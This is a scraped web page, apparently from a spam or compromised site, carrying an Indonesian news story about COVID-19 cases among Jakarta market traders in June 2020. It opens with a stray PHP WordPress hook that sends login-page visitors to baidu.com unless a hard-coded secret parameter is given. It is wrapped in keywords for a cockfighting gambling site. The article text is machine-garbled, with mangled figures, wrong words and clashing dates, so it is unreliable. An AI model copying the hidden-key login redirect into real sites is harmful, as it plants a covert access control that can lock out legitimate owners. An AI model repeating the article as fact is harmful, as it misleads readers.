//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Pasar tradisional positif Covid-19, di mana ada pedagang, DPRD DKI minta dinas kesehatan lakukan tes usap secara intensif | adu ayam bali_s128.net login_s128.live

Pasar tradisional positif Covid-19, di mana ada pedagang, DPRD DKI minta dinas kesehatan lakukan tes usap secara intensif

Laporan Danang Triatmojo, reporter Tribunnews.com di Jakarta-Johnny Simanjuntak, Sekretaris Panitia EDPRD DKI, mengusulkan kepada Perumda Pasar Jaya untuk menggunakan metode polymerase (PCR) chain reaction untuk meningkatkan pemeriksaan swab di pasar tradisional.

Hal ini menanggapi banyaknya penemuan pedagang aktif Covid-19, seperti yang ditemukan di pasar Gondangdia dan Pasar Kebayoran Lama, yang berujung pada penutupan pasar.

“PCR dan pengujian serta pengujian Swab lainnya harus memperkuat pasar, karena di sinilah orang berkumpul dan banyak ditemukan pelanggaran kecil, seperti pelanggaran jarak.” Johnny, Jumat (19 Juni 2020) Memberitahu wartawan. Ia menilai Dinas Kesehatan DKI bisa menyelesaikan proposal tersebut, terutama dalam penanganan Cop-19, terutama saat membeli Rat.66,5 mi liar untuk menyetujui anggaran darurat (BTT) yang digunakan untuk mengelola Covid-19.

Politisi PDIP tersebut juga meminta Dinas Kesehatan DKI Jakarta untuk berkoordinasi dan mengawasi program kesehatan pasar dengan Satpol PP. – “Dinkes harus kerja sama dengan SKPD lain seperti Satpol PP untuk penguatan program pengawasan dan sanitasi. Katanya: – Bacaan: 14 pedagang di Pasar Kebayoran dinyatakan positif Covid-19, Satpol PP: Pengawasan sudah berakhir- — Dulu saya tahu kalau dua pasar yaitu pasar Gondangdia dan Kebayoran tutup sementara selama tiga hari setelah dua live dealer dinyatakan positif Covid-19.

Kemarin (15/6) Senin kepada Pada Juni lalu, pasar Gondangdia di Menteng, Jakarta Pusat ditutup sementara.Pada 17 Juli 2020, uji usap kapas menemukan seorang pedagang di pasar tersebut memastikan Covid-19 positif p.

Baca: 14 pedagang aktif Corona, Pasar Kebayoran Lama tutup hari ini dan akan dibuka kembali pada 20 Juni-dan Pasar Kebayoran Lama akan tiba pada tiga (3) hari mulai Kamis (18/6) hingga Sabtu (20/6).

Leave a comment

adu ayam bali_s128.net login_s128.live